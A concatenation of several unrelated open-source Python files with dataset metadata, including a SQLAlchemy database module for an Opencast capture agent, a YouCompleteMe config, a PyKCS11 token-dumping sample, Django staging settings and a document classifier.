from sqlalchemy.orm import sessionmaker
from datetime import datetime
from functools import wraps

Base = declarative_base()


def init():
    '''Initialize connection to database. Additionally the basic database
    structure will be created if nonexistent.
    '''
    global engine
    engine = create_engine(config('agent', 'database'))
    Base.metadata.create_all(engine)


def get_session():
    '''Get a session for database communication. If necessary a new connection
    to the database will be established.

    :return: Database session
    '''
    if 'engine' not in globals():
        init()
    Session = sessionmaker(bind=engine)
    return Session()


def with_session(f):
    """Wrapper for f to make a SQLAlchemy session present within the function

    :param f: Function to call
    :type f: Function
    :raises e: Possible exception of f
    :return: Result of f
    """
    @wraps(f)
    def decorated(*args, **kwargs):
        session = get_session()
        try:
            result = f(session, *args, **kwargs)
        except Exception as e:
            session.rollback()
            raise e
        finally:
            session.close()
        return result
    return decorated
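
# A minimal usage sketch (hypothetical function name): the decorator injects
# the session as the first positional argument and handles rollback/close.
#
#     @with_session
#     def count_events(db):
#         return db.query(UpcomingEvent).count()
#
#     n = count_events()  # called without passing a session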
class Constants():

    @classmethod
    def str(cls, value):
        '''Convert status (id) to its string name.'''
        for k, v in cls.__dict__.items():
            if k[0] in string.ascii_uppercase and v == value:
                return k.lower().replace('_', ' ')


class Status(Constants):
    '''Event status definitions
    '''
    UPCOMING = 1
    RECORDING = 2
    FAILED_RECORDING = 3
    FINISHED_RECORDING = 4
    UPLOADING = 5
    FAILED_UPLOADING = 6
    FINISHED_UPLOADING = 7
    PARTIAL_RECORDING = 8
    PAUSED_AFTER_RECORDING = 9


class ServiceStatus(Constants):
    '''Service status type definitions
    '''
    STOPPED = 1
    IDLE = 2
    BUSY = 3


class Service(Constants):
    '''Service type definitions
    '''
    AGENTSTATE = 1
    CAPTURE = 2
    INGEST = 3
    SCHEDULE = 4
# Database Schema Definition

class BaseEvent():
    '''Database definition of an event.'''

    __tablename__ = 'event'

    uid = Column('uid', Text(), nullable=False, primary_key=True)
    start = Column('start', Integer(), primary_key=True)
    end = Column('end', Integer(), nullable=False)
    title = Column('title', Text())
    data = Column('data', LargeBinary(), nullable=False)
    status = Column('status', Integer(), nullable=False,
                    default=Status.UPCOMING)
    tracks = Column('tracks', LargeBinary(), nullable=True)

    def get_data(self):
        '''Load JSON data from event.
        '''
        return json.loads(self.data.decode('utf-8'))

    def set_data(self, data):
        '''Store data as JSON.
        '''
        # Python 3 wants bytes
        self.data = json.dumps(data).encode('utf-8')

    def name(self):
        '''Returns the filesystem name of this event.
        '''
        return 'recording-%i-%s' % (self.start, self.uid)

    def directory(self):
        '''Returns recording directory of this event.
        '''
        return os.path.join(config('capture', 'directory'), self.name())

    def remaining_duration(self, time):
        '''Returns the remaining duration for a recording.
        '''
        return max(0, self.end - max(self.start, time))

    def status_str(self):
        '''Return status as string.
        '''
        return Status.str(self.status)

    def get_tracks(self):
        '''Load JSON track data from event.
        '''
        if not self.tracks:
            return []
        return json.loads(self.tracks.decode('utf-8'))

    def set_tracks(self, tracks):
        '''Store track data as JSON.
        '''
        self.tracks = json.dumps(tracks).encode('utf-8')

    def __repr__(self):
        '''Return a string representation of an event object.

        :return: String representation of object.
        '''
        return '<Event(start=%i, uid="%s")>' % (self.start, self.uid)

    def serialize(self):
        '''Serialize this object as dictionary usable for conversion to JSON.

        :return: Dictionary representing this object.
        '''
        return {
            'type': 'event',
            'id': self.uid,
            'attributes': {
                'start': self.start,
                'end': self.end,
                'uid': self.uid,
                'title': self.title,
                'data': self.get_data(),
                'status': Status.str(self.status)
            }
        }
class UpcomingEvent(Base, BaseEvent):
    '''List of upcoming events'''
    __tablename__ = 'upcoming_event'


class RecordedEvent(Base, BaseEvent):
    '''List of events pyca tried to record.'''
    __tablename__ = 'recorded_event'

    def __init__(self, event=None):
        if event:
            self.uid = event.uid
            self.start = event.start
            self.end = event.end
            self.title = event.title
            self.data = event.data
            self.status = event.status


class ServiceStates(Base):
    '''List of internal service states.'''
    __tablename__ = 'service_states'

    type = Column('type', Integer(), nullable=False, primary_key=True)
    status = Column('status', Integer(), nullable=False,
                    default=ServiceStatus.STOPPED)

    def __init__(self, service=None):
        if service:
            self.type = service.type
            self.status = service.status


class UpstreamState(Base):
    '''State of the upstream Opencast server.'''
    __tablename__ = 'upstream_state'

    url = Column('url', Text(), primary_key=True)
    last_synced = Column('last_synced', DateTime())

    @staticmethod
    def update_sync_time(url):
        s = get_session()
        s.merge(UpstreamState(url=url, last_synced=datetime.utcnow()))
        s.commit()
        s.close()
| lgpl-3.0 | 1,113,225,229,775,429,800 | 25.050633 | 78 | 0.587302 | false |
vhb/dotfiles | vim/ycm_extra_conf.py | 1 | 2505 | import os
import ycm_core
from clang_helpers import PrepareClangFlags
# Set this to the absolute path to the folder (NOT the file!) containing the
# compile_commands.json file to use that instead of 'flags'. See here for
# more details: http://clang.llvm.org/docs/JSONCompilationDatabase.html
# Most projects will NOT need to set this to anything; you can just change the
# 'flags' list of compilation flags. Notice that YCM itself uses that approach.
compilation_database_folder = ''
# These are the compilation flags that will be used in case there's no
# compilation database set.
flags = [
    '-Wall',
    '-W',
    '-Wextra',
    '-std=c++11',
    '-stdlib=libc++',
    '-x',
    'c++',
    '-I',
    '.',
    '-I',
    '/usr/include/c++/4.2.1/'
]

if compilation_database_folder:
    database = ycm_core.CompilationDatabase(compilation_database_folder)
else:
    database = None


def DirectoryOfThisScript():
    return os.path.dirname(os.path.abspath(__file__))


def MakeRelativePathsInFlagsAbsolute(flags, working_directory):
    if not working_directory:
        return flags
    new_flags = []
    make_next_absolute = False
    path_flags = ['-isystem', '-I', '-iquote', '--sysroot=']
    for flag in flags:
        new_flag = flag

        if make_next_absolute:
            make_next_absolute = False
            if not flag.startswith('/'):
                new_flag = os.path.join(working_directory, flag)

        for path_flag in path_flags:
            if flag == path_flag:
                make_next_absolute = True
                break

            if flag.startswith(path_flag):
                path = flag[len(path_flag):]
                new_flag = path_flag + os.path.join(working_directory, path)
                break

        if new_flag:
            new_flags.append(new_flag)
    return new_flags


def FlagsForFile(filename):
    if database:
        # Bear in mind that compilation_info.compiler_flags_ does NOT return a
        # python list, but a "list-like" StringVec object
        compilation_info = database.GetCompilationInfoForFile(filename)
        final_flags = PrepareClangFlags(
            MakeRelativePathsInFlagsAbsolute(
                compilation_info.compiler_flags_,
                compilation_info.compiler_working_dir_),
            filename)
    else:
        relative_to = DirectoryOfThisScript()
        final_flags = MakeRelativePathsInFlagsAbsolute(flags, relative_to)

    return {
        'flags': final_flags,
        'do_cache': True}
| mit | -1,765,271,193,283,489,800 | 28.821429 | 79 | 0.625948 | false |
Lenchik13/Testing | test/test_edit_contact.py | 1 | 1223 | from model.contact import Contact
import random
def test_edit_contact(app, db, check_ui):
    app.open_home_page()
    if app.contact.count() == 0:
        app.contact.create(Contact(firstname="Contact", lastname="", nickname="",
                                   address="", company="", home="",
                                   mobile="", work="", fax="", email="",
                                   email2="", email3="", homepage="",
                                   byear="", address2="", phone2="",
                                   notes="", bday="20", bmonth="6"))
    old_contacts = db.get_contact_list()
    rcontact = random.choice(old_contacts)
    contact = Contact(lastname="lname", firstname="fname", address="address")
    contact.id = rcontact.id
    app.contact.modify_contact_by_id(contact)
    app.open_home_page()
    assert len(old_contacts) == app.contact.count()
    new_contacts = db.get_contact_list()
    old_contacts.remove(rcontact)
    old_contacts.append(contact)
    assert sorted(old_contacts, key=Contact.id_or_max) == sorted(new_contacts, key=Contact.id_or_max)
    if check_ui:
        assert sorted(new_contacts, key=Contact.id_or_max) == sorted(app.contact.get_contact_list(), key=Contact.id_or_max)
| apache-2.0 | -8,770,590,787,177,672,000 | 42.678571 | 123 | 0.58381 | false |
igorcoding/forum-api | api/api_helpers/common_helper.py | 1 | 1533 | import json
def required(param_list, args):
    for param in param_list:
        if type(param) != str:
            raise Exception("param must be a string value")
        if param not in args:
            raise Exception("%s is required." % (param,))


def semi_required(param_variations, args):
    atleast = False
    all = True
    for param in param_variations:
        arg = param in args
        atleast = atleast or arg
        all = all and arg

    if all:
        raise Exception("All variations cannot be in one request simultaneously")
    if not atleast:
        raise Exception("None of the variations is in the arguments list")


def optional(param, args, default=None, possible_values=None):
    if param not in args:
        args[param] = default
    try:
        args[param] = json.loads(args[param], encoding='utf-8')
    except:
        args[param] = args[param]

    def check_arg(arg, values):
        if arg not in values:
            raise Exception("%s not in %s" % (arg, values))

    if type(args[param]) == list and type(possible_values) == list:
        for arg in args[param]:
            check_arg(arg, possible_values)
    if type(args[param]) != list and type(possible_values) == list:
        check_arg(args[param], possible_values)


def make_boolean(params, arr):
    for param in params:
        arr[param] = bool(arr[param])


def check_empty(res, message):
    if not res or len(res) == 0:
        raise Exception(message)


def date_to_str(date):
    return date.strftime("%Y-%m-%d %H:%M:%S")
hfalcic/PyKCS11 | samples/dumpit.py | 1 | 10079 | #!/usr/bin/env python
# Copyright (C) 2006-2008 Ludovic Rousseau ([email protected])
#
# This file is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
from __future__ import print_function
import PyKCS11
import binascii
import getopt
import sys
import platform
# from http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/142812
# Title: Hex dumper
# Submitter: Sebastien Keim (other recipes)
# Last Updated: 2002/08/05
# Version no: 1.0
def hexx(intval):
    x = hex(intval)[2:]
    if (x[-1:].upper() == 'L'):
        x = x[:-1]
    if len(x) % 2 != 0:
        return "0%s" % x
    return x
def dump(src, length=8):
    FILTER = ''.join([(len(repr(chr(x))) == 3) and chr(x) or '.' for x in range(256)])
    N = 0
    result = ''
    while src:
        s, src = src[:length], src[length:]
        hexa = ' '.join(["%02X" % ord(x) for x in s])
        s = s.translate(FILTER)
        result += "%04X %-*s %s\n" % (N, length * 3, hexa, s)
        N += length
    return result
def usage():
    print("Usage:", sys.argv[0], end=' ')
    print("[-p pin][--pin=pin] (use --pin=NULL for pinpad)", end=' ')
    print("[-c lib][--lib=lib]", end=' ')
    print("[-S][--sign]", end=' ')
    print("[-d][--decrypt]", end=' ')
    print("[-h][--help]", end=' ')
try:
    opts, args = getopt.getopt(sys.argv[1:], "p:c:Sd:h", ["pin=", "lib=", "sign", "decrypt", "help"])
except getopt.GetoptError:
    # print help information and exit:
    usage()
    sys.exit(2)
pin_available = False
decrypt = sign = False
lib = None
for o, a in opts:
    if o in ("-h", "--help"):
        usage()
        sys.exit()
    elif o in ("-p", "--pin"):
        pin = a
        if pin == "NULL":
            pin = None
        pin_available = True
    elif o in ("-c", "--lib"):
        lib = a
        print("using PKCS11 lib:", lib)
    elif o in ("-S", "--sign"):
        sign = True
    elif o in ("-d", "--decrypt"):
        decrypt = True
red = blue = magenta = normal = ""
if sys.stdout.isatty() and platform.system().lower() != 'windows':
    red = "\x1b[01;31m"
    blue = "\x1b[34m"
    magenta = "\x1b[35m"
    normal = "\x1b[0m"
format_long = magenta + " %s:" + blue + " %s (%s)" + normal
format_binary = magenta + " %s:" + blue + " %d bytes" + normal
format_normal = magenta + " %s:" + blue + " %s" + normal
pkcs11 = PyKCS11.PyKCS11Lib()
pkcs11.load(lib)
info = pkcs11.getInfo()
print("Library manufacturerID:", info.manufacturerID)
slots = pkcs11.getSlotList()
print("Available Slots:", len(slots))
for s in slots:
    try:
        i = pkcs11.getSlotInfo(s)
        print("Slot no:", s)
        print(format_normal % ("slotDescription", i.slotDescription.strip()))
        print(format_normal % ("manufacturerID", i.manufacturerID.strip()))

        t = pkcs11.getTokenInfo(s)
        print("TokenInfo")
        print(format_normal % ("label", t.label.strip()))
        print(format_normal % ("manufacturerID", t.manufacturerID.strip()))
        print(format_normal % ("model", t.model.strip()))

        session = pkcs11.openSession(s)
        print("Opened session 0x%08X" % session.session.value())

        if pin_available:
            try:
                session.login(pin=pin)
            except:
                print("login failed, exception:", str(sys.exc_info()[1]))

        objects = session.findObjects()
        print()
        print("Found %d objects: %s" % (len(objects), [x.value() for x in objects]))

        all_attributes = list(PyKCS11.CKA.keys())
        # remove the CKR_ATTRIBUTE_SENSITIVE attributes since we can't get
        # their values and will get an exception instead
        all_attributes.remove(PyKCS11.CKA_PRIVATE_EXPONENT)
        all_attributes.remove(PyKCS11.CKA_PRIME_1)
        all_attributes.remove(PyKCS11.CKA_PRIME_2)
        all_attributes.remove(PyKCS11.CKA_EXPONENT_1)
        all_attributes.remove(PyKCS11.CKA_EXPONENT_2)
        all_attributes.remove(PyKCS11.CKA_COEFFICIENT)
        # only use the integer values and not the strings like 'CKM_RSA_PKCS'
        all_attributes = [e for e in all_attributes if isinstance(e, int)]

        for o in objects:
            print()
            print((red + "==================== Object: %d ====================" + normal) % o.value())
            attributes = session.getAttributeValue(o, all_attributes)
            attrDict = dict(list(zip(all_attributes, attributes)))
            if attrDict[PyKCS11.CKA_CLASS] == PyKCS11.CKO_PRIVATE_KEY \
               and attrDict[PyKCS11.CKA_KEY_TYPE] == PyKCS11.CKK_RSA:
                m = attrDict[PyKCS11.CKA_MODULUS]
                e = attrDict[PyKCS11.CKA_PUBLIC_EXPONENT]
                if m and e:
                    mx = eval(b'0x' + binascii.hexlify(''.join(chr(c) for c in m).encode('ascii')))
                    ex = eval(b'0x' + binascii.hexlify(''.join(chr(c) for c in e).encode('ascii')))
                if sign:
                    try:
                        toSign = b"12345678901234567890"  # 20 bytes, SHA1 digest
                        print("* Signing with object 0x%08X following data: %s" % (o.value(), toSign))
                        signature = session.sign(o, toSign)
                        s = binascii.hexlify(''.join(chr(c) for c in signature).encode('ascii'))
                        sx = eval(b'0x' + s)
                        print("Signature:")
                        print(dump(''.join(map(chr, signature)), 16))
                        if m and e:
                            print("Verifying using following public key:")
                            print("Modulus:")
                            print(dump(''.join(map(chr, m)), 16))
                            print("Exponent:")
                            print(dump(''.join(map(chr, e)), 16))
                            decrypted = pow(sx, ex, mx)  # RSA
                            print("Decrypted:")
                            d = binascii.unhexlify(hexx(decrypted))
                            print(dump(d, 16))
                            if toSign == d[-20:]:
                                print("*** signature VERIFIED!\n")
                            else:
                                print("*** signature NOT VERIFIED; decrypted value:")
                                print(hex(decrypted), "\n")
                        else:
                            print("Unable to verify signature: MODULUS/PUBLIC_EXP not found")
                    except:
                        print("Sign failed, exception:", str(sys.exc_info()[1]))
                if decrypt:
                    if m and e:
                        try:
                            toEncrypt = "12345678901234567890"
                            # note: PKCS1 BT2 padding should be random data,
                            # but this is just a test and we use 0xFF...
                            padded = "\x00\x02%s\x00%s" % ("\xFF" * (128 - (len(toEncrypt)) - 3), toEncrypt)
                            padded = padded.encode('latin-1')
                            print("* Decrypting with 0x%08X following data: %s" % (o.value(), toEncrypt))
                            print("padded:\n", dump(padded, 16))
                            encrypted = pow(eval('0x%sL' % binascii.hexlify(padded)), ex, mx)  # RSA
                            encrypted1 = binascii.unhexlify(hexx(encrypted))
                            print("encrypted:\n", dump(encrypted1, 16))
                            decrypted = session.decrypt(o, encrypted1)
                            decrypted1 = ''.join(chr(i) for i in decrypted)
                            print("decrypted:\n", dump(decrypted1, 16))
                            if decrypted1 == toEncrypt:
                                print("decryption SUCCESSFULL!\n")
                            else:
                                print("decryption FAILED!\n")
                        except:
                            print("Decrypt failed, exception:", str(sys.exc_info()[1]))
                    else:
                        print("ERROR: Private key don't have MODULUS/PUBLIC_EXP")

            print("Dumping attributes:")
            for q, a in zip(all_attributes, attributes):
                if a == None:
                    # undefined (CKR_ATTRIBUTE_TYPE_INVALID) attribute
                    continue
                if q == PyKCS11.CKA_CLASS:
                    print(format_long % (PyKCS11.CKA[q], PyKCS11.CKO[a], a))
                elif q == PyKCS11.CKA_CERTIFICATE_TYPE:
                    print(format_long % (PyKCS11.CKA[q], PyKCS11.CKC[a], a))
                elif q == PyKCS11.CKA_KEY_TYPE:
                    print(format_long % (PyKCS11.CKA[q], PyKCS11.CKK[a], a))
                elif session.isBin(q):
                    print(format_binary % (PyKCS11.CKA[q], len(a)))
                    if a:
                        print(dump(''.join(map(chr, a)), 16), end=' ')
                elif q == PyKCS11.CKA_SERIAL_NUMBER:
                    print(format_binary % (PyKCS11.CKA[q], len(a)))
                    if a:
                        print(dump(a, 16), end=' ')
                else:
                    print(format_normal % (PyKCS11.CKA[q], a))
            print()

        if pin_available:
            try:
                session.logout()
            except:
                print("logout failed, exception:", str(sys.exc_info()[1]))

        session.closeSession()

    except PyKCS11.PyKCS11Error as e:
        print("Error:", e)
cineuse/CNCGToolKit | cgtkLibs/cgtk_os/delete_folder.py | 1 | 1091 | # coding=utf8
# Copyright (c) 2016 CineUse
import os
import shutil
import logging
import cgtk_log
log = cgtk_log.cgtk_log(level=logging.INFO)
def delete_folder(src):
    """
    Deletes all files from inside a folder

    .. warning::
        This will delete all files in the folder specified

    Args:
        src (basestring): directory to clean

    """
    if os.path.isfile(src):
        try:
            os.remove(src)
            log.info(src)
        except IOError:
            pass
    elif os.path.isdir(src):
        try:
            shutil.rmtree(src)
            log.info(src)
        except IOError:
            for roots, dirs, files in os.walk(src):
                for d in dirs:
                    itemsrc = os.path.join(roots, d)
                    for f in os.listdir(itemsrc):
                        itemfile = os.path.join(itemsrc, f)
                        try:
                            delete_folder(itemfile)
                        except IOError:
                            pass


if __name__ == "__main__":
    delete_folder(r"E:\temp\needclear")
| mit | 3,809,987,850,486,803,500 | 22.717391 | 59 | 0.499542 | false |
GautamShine/toxic-docs | categorize.py | 1 | 3580 | #!/usr/bin/env python
"""
__author__ = 'Gautam Shine'
__email__ = '[email protected]'
Document classifier for the "Toxic Docs" repository from Columbia University
and the Center for Public Integrity. Data set consists of PDF files of
emails, memos, advertisements, news articles, scientific articles cited in
legal cases involving allegations of environmental harm from toxic substances.
"""
from processing import *
from modeling import *
from analyzing import *
import time
from sklearn.svm import LinearSVC
"""
Main
"""
if __name__ == '__main__':

    bson_file = 'documents.bson'
    label_key = 'document_type'
    text_key = 'text'

    # Process the raw data
    dp = DataProcessor(text_key, label_key, num_chars=300)
    da = DataAnalyzer(text_key)
    docs, y_all, counts = dp.load_bson(bson_file)

    t0 = time.time()
    vectorizer, X_all_ngram, feat_names = dp.vectorize(docs, min_df=5, max_ngram=2)
    vec_time = time.time() - t0

    # Replace regex labels with human labels
    y_all = np.loadtxt('labels.txt', dtype=np.int32)

    # Add unknown labels for new set; old = 24085, new = 27829, total = 51914
    y_all = np.hstack((y_all, -1*np.ones(27829, dtype=np.int32)))
    counts = np.bincount(y_all[y_all != -1])
    counts = [counts[i] for i in range(len(counts)) if i in dp.label_index_list]

    # Add extra features from ToxicDocs to n-gram data matrix
    key_list = ['num_pages']
    feats = dp.get_feats(docs, key_list)
    X_all = dp.stack_feats(X_all_ngram, feats)
    key_list.append('length')
    feat_names.extend(key_list)

    print('Vectorization time:', vec_time)
    print('Data matrix size:', X_all.shape)

    y_train, X_train, ind_train, y_test, X_test, ind_test, X_unlab, ind_unlab =\
        dp.split_data(y_all, X_all, split=0.7, seed=0)

    me = ModelEvaluator()

    # LinearSVC (liblinear SVM implementation, one-v-all)
    cross_validate = True
    if cross_validate:
        model = LinearSVC(penalty='l2', loss='squared_hinge', dual=True, tol=0.0001,
                          C=1, multi_class='ovr', fit_intercept=True, intercept_scaling=1,
                          class_weight='balanced', verbose=0, random_state=None, max_iter=1000)
        param_grid = {'C': np.logspace(-2, 2, 24).tolist()}
        grid_info, grid_best, grid_time = me.param_search(model, param_grid,
                                                          y_train, X_train, num_folds=10)
        C = grid_best['C']
    else:
        C = 1
    print('C: ', C)

    SVM = LinearSVC(penalty='l2', loss='squared_hinge', dual=True, tol=0.0001,
                    C=C, multi_class='ovr', fit_intercept=True, intercept_scaling=1,
                    class_weight='balanced', verbose=0, random_state=None, max_iter=1000)

    plot_learning = False
    if plot_learning:
        splits = np.linspace(0.1, 0.9, 300)
        me.generate_learning_curve(SVM, X_train, y_train, splits)

    # Train model on training set and check top 1 test accuracy
    SVM_train_acc, SVM_train_time = me.train(SVM, y_train, X_train)
    SVM_y_pred, SVM_test_acc, SVM_test_prec, SVM_test_rec, SVM_test_time =\
        me.test(SVM, y_test, X_test, dp.label_index_list)
    me.print_scores(dp, SVM_test_acc, SVM_test_prec, SVM_test_rec)

    # Print top 3 accuracy
    top_n_score, top_n_vec = me.top_n_acc(SVM, y_test, X_test, dp.label_index_list, n=3)
    print(top_n_score)

    # Retrain on all data
    SVM.fit(sp.vstack((X_train, X_test)), np.hstack((y_train, y_test)))

    # Save results to comma-separated text file
    predictions = SVM.predict(X_all).reshape(1, -1)
    np.savetxt('predictions.txt', predictions, fmt='%d', delimiter=', ')
LinkCareServices/cairotft | cairotft/widgets/base.py | 1 | 5884 | # Copyright (c) 2015, Thomas Chiroux - Link Care Services
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of cairotft nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""base widget class."""
class BaseWidget():
    """Base class for all widgets.

    :ivar display_object: (:class:`cairotft.tft.TftDisplay`) The display
        object the widget will display itself.
    :ivar pos_x: (:py:class:`int`) x coordinates to display the widget
    :ivar pos_y: (:py:class:`int`) y coordinates to display the widget
    :ivar width: (:py:class:`int`) the width of the widget
    :ivar height: (:py:class:`int`) the height of the widget
    """

    def __init__(self, display_object,
                 pos_x, pos_y, width, height):
        """Initialisation of the base widget.

        :param display_object: the Display class instanciation.
        :type display_object: :class:`cairotft.tft.TftDisplay`
        :param int pos_x: x coordinates to display the widget
        :param int pos_y: y coordinates to display the widget
        :param int width: the width of the widget
        :param int height: the height of the widget
        """
        self.display_object = display_object
        self.pos_x = pos_x
        self.pos_y = pos_y
        self.width = width
        self.height = height
        self._stop = False
        self._showing = False

    def draw(self, ctx):
        """draw the widget.

        implement this method in your subclasses
        """
        raise NotImplementedError

    def show(self, ctx):
        """show the icon."""
        # here call the draw method (which includes the eventual blit)
        self.draw(ctx)

    def start(self, ctx):
        """Start showing the widget."""
        self.display_object.loop.call_soon(
            self.show, ctx)

    def stop(self):
        """stop showing the widget."""
        pass


class BaseAnimatedWidget(BaseWidget):
    """Base class for all animated widgets.

    see :class:`BaseWidget` for all BaseWidget variables

    :ivar float interval_time: (:py:class:`float`) interval between
        two frames (in seconds)

    TODO: add transition support in BaseAnimatedWidget
    """

    def __init__(self, display_object,
                 pos_x, pos_y, width, height,
                 interval_time=None):
        """Initialisation of the base animated widget.

        :param display_object: the Display class instanciation.
        :type display_object: :class:`cairotft.tft.TftDisplay`
        :param int pos_x: x coordinates to display the widget
        :param int pos_y: y coordinates to display the widget
        :param int width: the width of the widget
        :param int height: the height of the widget
        :param float interval_time: interval between two frames (in seconds)

        the widget will first:
            try to use the fps parameter to calculate a display interval
            or: use the given interval_time
            or: fix an interval time of 1 second
        """
        super().__init__(display_object, pos_x, pos_y, width, height)
        if self.display_object.fps is not None and interval_time is not None:
            self.interval_time = max(interval_time,
                                     1 / self.display_object.fps)
        elif self.display_object.fps is not None and interval_time is None:
            self.interval_time = 1 / self.display_object.fps
        elif self.display_object.fps is None and interval_time is not None:
            self.interval_time = interval_time
        else:
            self.interval_time = 1
        self._stop = False
        self._showing = False

    def draw(self, ctx):
        """draw the widget.

        implement this method in your subclasses
        """
        raise NotImplementedError

    def show(self, ctx):
        """show the icon."""
        if not self._stop:
            # here call the draw method (which includes the eventual blit)
            self._showing = True
            self.draw(ctx)
            # then schedule the next frame
            self.display_object.loop.call_later(
                self.interval_time, self.show, ctx)

    def start(self, ctx):
        """Start showing the widget."""
        if not self._showing:
            self._showing = True
            self._stop = False
            self.display_object.loop.call_soon(
                self.show, ctx)

    def stop(self):
        """stop showing the widget."""
        self._stop = True
        self._showing = False
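
# A minimal subclass sketch (hypothetical names; assumes a display object with
# an event loop and a cairo context `ctx`, as used by the classes above):
#
#     class BlinkingDot(BaseAnimatedWidget):
#         def draw(self, ctx):
#             ctx.rectangle(self.pos_x, self.pos_y, self.width, self.height)
#             ctx.fill()
#
#     widget = BlinkingDot(display, 0, 0, 10, 10, interval_time=0.5)
#     widget.start(ctx)   # redraws every 0.5s until widget.stop() is called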
| bsd-3-clause | 4,971,206,907,318,229 | 36.240506 | 79 | 0.64344 | false |
ouh-churchill/quod | config/settings/staging.py | 1 | 3522 | #!/usr/bin/python
# coding: utf-8
from __future__ import absolute_import, unicode_literals
'''
Local settings
- Use djangosecure
'''
from .common import * # noqa
print("DEBUG: Loading settings from staging")
# Because we're behind a reverse proxy, pay attention to where the request is coming from
USE_X_FORWARDED_HOST = True
FORCE_SCRIPT_NAME = env('FORCE_SCRIPT_NAME', default='/quod/')
# django-secure
# ------------------------------------------------------------------------------
# INSTALLED_APPS += ["djangosecure", ]
# SECURITY_MIDDLEWARE = [
# 'djangosecure.middleware.SecurityMiddleware',
# ]
# MIDDLEWARE = SECURITY_MIDDLEWARE + MIDDLEWARE
# set this to 60 seconds and then to 518400 when you can prove it works
SECURE_HSTS_SECONDS = 60
SECURE_HSTS_INCLUDE_SUBDOMAINS = env.bool("DJANGO_SECURE_HSTS_INCLUDE_SUBDOMAINS", default=True)
SECURE_FRAME_DENY = env.bool("DJANGO_SECURE_FRAME_DENY", default=True)
SECURE_CONTENT_TYPE_NOSNIFF = env.bool("DJANGO_SECURE_CONTENT_TYPE_NOSNIFF", default=True)
SECURE_BROWSER_XSS_FILTER = True
SESSION_COOKIE_SECURE = True
SESSION_COOKIE_HTTPONLY = True
SECURE_SSL_REDIRECT = env.bool("DJANGO_SECURE_SSL_REDIRECT", default=True)
# SITE CONFIGURATION
# ------------------------------------------------------------------------------
# Hosts/domain names that are valid for this site
# See https://docs.djangoproject.com/en/1.6/ref/settings/#allowed-hosts
# ALLOWED_HOSTS = env.list('DJANGO_ALLOWED_HOSTS', default=['example.com']) -- In Common.py
# SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTOCOL', 'https')
# END SITE CONFIGURATION
INSTALLED_APPS += ["gunicorn", ]
# Mail settings
# ------------------------------------------------------------------------------
EMAIL_HOST = env('DJANGO_EMAIL_HOST', default='localhost')
EMAIL_PORT = 25
EMAIL_BACKEND = env('DJANGO_EMAIL_BACKEND', default='django.core.mail.backends.smtp.EmailBackend')
DEFAULT_FROM_EMAIL = env('DJANGO_DEFAULT_FROM_EMAIL', default='QUODsite <[email protected]>')
EMAIL_SUBJECT_PREFIX = env("DJANGO_EMAIL_SUBJECT_PREFIX", default='[QUODsite] ')
SERVER_EMAIL = env('DJANGO_SERVER_EMAIL', default=DEFAULT_FROM_EMAIL)
# TEMPLATE CONFIGURATION
# ------------------------------------------------------------------------------
# See:
# https://docs.djangoproject.com/en/dev/ref/templates/api/#django.template.loaders.cached.Loader
TEMPLATES[0]['OPTIONS']['loaders'] = [
    ('django.template.loaders.cached.Loader', [
        'django.template.loaders.filesystem.Loader',
        'django.template.loaders.app_directories.Loader',
    ]),
]
# CACHING
# ------------------------------------------------------------------------------
CACHES = {
    'default': {
        'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
        'LOCATION': ''
    }
}
LOGGING = {
    'version': 1,
    'disable_existing_loggers': True,
    'formatters': {
        'verbose': {
            'format': '%(asctime)s %(levelname)s [%(name)s:%(lineno)s] %(module)s %(process)d %(thread)d %(message)s'
        }
    },
    'handlers': {
        'gunicorn': {
            'level': 'DEBUG',
            'class': 'logging.handlers.RotatingFileHandler',
            'formatter': 'verbose',
            'filename': env('GUNICORN_ERRORS_LOGFILE', default='/tmp/quod.gunicorn.errors'),
            'maxBytes': 1024 * 1024 * 100,  # 100 mb
        }
    },
    'loggers': {
        'gunicorn.errors': {
            'level': 'DEBUG',
            'handlers': ['gunicorn'],
            'propagate': True,
        },
    }
}
| mit | -4,037,620,605,904,640,000 | 33.871287 | 117 | 0.592561 | false |
trevor/calendarserver | calendarserver/tools/push.py | 1 | 4102 | #!/usr/bin/env python
##
# Copyright (c) 2012-2014 Apple Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
